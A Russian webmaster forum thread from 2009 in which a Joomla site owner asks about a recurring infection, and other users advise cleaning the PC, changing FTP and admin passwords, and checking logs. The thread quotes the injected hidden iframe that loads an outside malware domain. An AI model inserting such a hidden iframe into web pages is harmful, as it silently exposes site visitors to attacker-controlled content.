X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> вирус мучает мою джумлу, в индексе и в шаблоне
vetbars
vetbars
Topic Starter сообщение 26.4.2009, 14:22; Ответить: vetbars
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 648
Регистрация: 27.1.2009
Поблагодарили: 194 раза
Репутация:   29  


Привет!

У меня проблема с вирусами, частенько садится вирус в index.php сайта и index.php шаблона. Раньше думал, что версия старая, (1.0.12 была), обновил до 1.0.15, написано, что в ней устранены серьезные дырки и т.д. В админке выставил максимальную безопасность.

После того как перезалеваю основной индекс, сайт начинает работать. Но вирус все равно обнаруживается... ни каспер ни нод его не видят, но авира например ругается.

В коде индекс.пхп шаблона добавляется вот эта строчка
<iframe src="http://googlerussiablog.cn/index.php" width="0" height="0" style="display:none;"></iframe>


Что делать? Это хостер чтоли такой дырявый у меня? или джумла не стабильная?


--------------------
тИЦ 130, PR 4, ЯК, DMOZ
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Mars
Mars
сообщение 26.4.2009, 14:33; Ответить: Mars
Сообщение #2


Участник
***


Группа: User
Сообщений: 132
Регистрация: 2.4.2009
Поблагодарили: 9 раз
Репутация:   2  


(vetbars @ 26.4.2009, 14:22) *
Привет!

У меня проблема с вирусами, частенько садится вирус в index.php сайта и index.php шаблона. Раньше думал, что версия старая, (1.0.12 была), обновил до 1.0.15, написано, что в ней устранены серьезные дырки и т.д. В админке выставил максимальную безопасность.

После того как перезалеваю основной индекс, сайт начинает работать. Но вирус все равно обнаруживается... ни каспер ни нод его не видят, но авира например ругается.

В коде индекс.пхп шаблона добавляется вот эта строчка
<iframe src="http://googlerussiablog.cn/index.php" width="0" height="0" style="display:none;"></iframe>


Что делать? Это хостер чтоли такой дырявый у меня? или джумла не стабильная?



Просто удали из index.php эту строчку и все норм! Было такое... Как бороться не знаю... Я один раз удалил, больше не мучали тьфу..тьфу...

Сообщение отредактировал Mars - 26.4.2009, 14:34
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vetbars
vetbars
Topic Starter сообщение 26.4.2009, 14:37; Ответить: vetbars
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 648
Регистрация: 27.1.2009
Поблагодарили: 194 раза
Репутация:   29  


Дык в том то и дело, уже 3ий раз удаляю. И снова появляется!


--------------------
тИЦ 130, PR 4, ЯК, DMOZ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vinokur
vinokur
сообщение 26.4.2009, 14:54; Ответить: vinokur
Сообщение #4


Участник
***

Группа: User
Сообщений: 128
Регистрация: 22.4.2008
Из: Москва
Поблагодарили: 28 раз
Репутация:   13  


Такого рода вирусы по следующей схеме работают. Ты цепляешь вирус сначала на свой локальный компьютер, тот сканирует куки и ищет пароли доступа по ftp. Все что найдет, собирает в общей базе, откуда централизовано в файлы с определенными именами (включающие слово index и ряд других во всех папках) вешается фрейм.

Делать надо следующее по шагам:
1. Вычисти свой компьютер.
2. Замени пароль на ftp
3. Очисти сайт (весь!). Фрейм у тебя не только в index.php. Запусти поиск по содержанию текста в файле.

В сумме это поможет.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vetbars
vetbars
Topic Starter сообщение 26.4.2009, 15:59; Ответить: vetbars
Сообщение #5


Завсегдатай
*****

Группа: Active User
Сообщений: 648
Регистрация: 27.1.2009
Поблагодарили: 194 раза
Репутация:   29  


Спасибо! Дейтсительно, во всех файлах индекс находится этот код sad.gif(( ПРидется чистить все. Подскажите пожалуйста, как так запустить поиск по содержанию текста в файле?

Сейчас все с фтп выкачаю и проверю. да?


--------------------
тИЦ 130, PR 4, ЯК, DMOZ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
anthon
anthon
сообщение 26.4.2009, 17:38; Ответить: anthon
Сообщение #6


Участник
***

Группа: User
Сообщений: 103
Регистрация: 25.1.2009
Из: Интернет
Поблагодарили: 20 раз
Репутация:   6  


поменяйте пароли FTP, не храните пароли на компе.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vetbars
vetbars
Topic Starter сообщение 26.4.2009, 19:07; Ответить: vetbars
Сообщение #7


Завсегдатай
*****

Группа: Active User
Сообщений: 648
Регистрация: 27.1.2009
Поблагодарили: 194 раза
Репутация:   29  


Начал подозревать, что все дела в компоненте com_joomlaxplorer. Он оставля у меян с версии 12. В 15ой его уже нету.... Прочитал по нему инфу, версия этого компонента 1.6.0 дырявая как решето, а у меня стоит 1.5.1 вообще. Так что будем надеяться что дело было в нем....

Спросил у хостера про шеллы, он сказал, что шеллы вообще на хостинге отключены для безопасности.

1. Вычисти свой компьютер.

сделал, нашел несколько вирей.

2. Замени пароль на ftp

сделал.

3. Очисти сайт (весь!)

с этим пока проблема.... не знаю весь или нет, но часть очистил путем замены файлов на оригинальные.


--------------------
тИЦ 130, PR 4, ЯК, DMOZ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vinokur
vinokur
сообщение 26.4.2009, 19:51; Ответить: vinokur
Сообщение #8


Участник
***

Группа: User
Сообщений: 128
Регистрация: 22.4.2008
Из: Москва
Поблагодарили: 28 раз
Репутация:   13  


Найти на ftp файлы с нужным текстом можно и без выкачивания содержания. Способов наверно много, но я использую Total Commander. Подключаешься по ftp (там кнопка прямо на панели) - у тебя содержимое открывается в одной из панелей программы. После этого запускаешь search (из директории Commands) и там в одной из опций можешь задать текст для поиска (кусок текста, который тебе инжектировали). После этого сиди и жди, пока программа будет искать smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Niken
Niken
сообщение 26.4.2009, 19:58; Ответить: Niken
Сообщение #9


Участник
***

Группа: User
Сообщений: 178
Регистрация: 19.4.2009
Из: Кемерово
Поблагодарили: 53 раза
Репутация:   10  


С джкмлой это никак не связано) Это проблема возникла либо у вас на машине, илбо у кого-то кто имеет доступ к фтп, после этого троян увёл все пароли. Поэтому, советую также сменить пароль и к админке


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vMaster
vMaster
сообщение 26.4.2009, 23:23; Ответить: vMaster
Сообщение #10


Участник
***

Группа: User
Сообщений: 180
Регистрация: 17.11.2008
Из: Калининград
Поблагодарили: 23 раза
Репутация:   6  


Спросил у хостера про шеллы, он сказал, что шеллы вообще на хостинге отключены для безопасности.

А толку, что отключены? =) Наверняка у них просто включен php safe_mode и отключены функции system(), passthru(), exec() и тому подобные. В любом случае, от взлома это не спасет.
Скорее всего на вашем сайте присутствует так называемый web-shell, с помощью которого злоумышленник вставляет iframe-код в индексы, либо backdoor, спрятанный в скриптах самой jooml'ы.
Если это так, вполне вероятно, что взлом мог быть произведен через "соседей" - то есть сайты, находящиеся на одном сервере с вашим сайтом. Как вариант.

В любом случае, рекомендую детально просмотреть логи сервера на предмет доступа к фтп не с вашего ip, а так же веб-сервера, на предмет возможных попыток взлома через http.

Сообщение отредактировал vMaster - 26.4.2009, 23:27


--------------------
Подбор НЧ запросов, используя данные статистики Liveinternet или Google Analytics
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вирус на службе маркетинга
2 jack 645 9.10.2017, 19:33
автор: jack
Открытая тема (нет новых ответов) Кто и зачем банит мою тему - прошу модера пояснить при всем честном народе..
3 MIGom 1544 20.6.2015, 0:29
автор: OlegK
Открытая тема (нет новых ответов) Помогите удалить вирус на joomla 1.5
Готов оплатить помощь.
5 pulsar21 2003 17.5.2013, 8:00
автор: pulsar21
Открытая тема (нет новых ответов) Найти вирус и удалить.
3 Minato 1070 2.2.2013, 20:24
автор: EvilGomel
Открытая тема (нет новых ответов) Требуется верстка на джумлу 1.5
не дорого
2 kosa1 902 14.6.2012, 17:38
автор: uggie8


 



RSS Текстовая версия Сейчас: 17.12.2017, 18:05
Дизайн